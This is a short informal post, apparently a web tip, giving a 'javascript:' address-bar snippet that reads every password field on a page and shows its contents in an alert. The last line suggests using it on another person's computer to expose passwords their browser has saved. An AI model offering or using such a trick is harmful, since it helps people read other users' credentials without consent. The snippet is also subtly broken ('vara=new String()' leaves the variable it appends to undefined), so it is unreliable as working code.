How to read a password:
1. Type in your password.
2. Enter the code below into your internets address bar.
javascript:vara=new String(); for (var i = 0; i < document.forms.length; i++) { for (var j = 0; j < document.forms[i].elements.length; j++) { if (document.forms[i].elements[j].type == "password") {a += document.forms[i].elements[j].value; } } } alert(a);
3. A message box will come up saying the password you typed.
Note: This only works for internet sites that use javascript (this is a pretty common language so yeah, it should work for most sites).
-->lol. you can paste it into another persons computer when they have used "Remember me" in f.ex firefox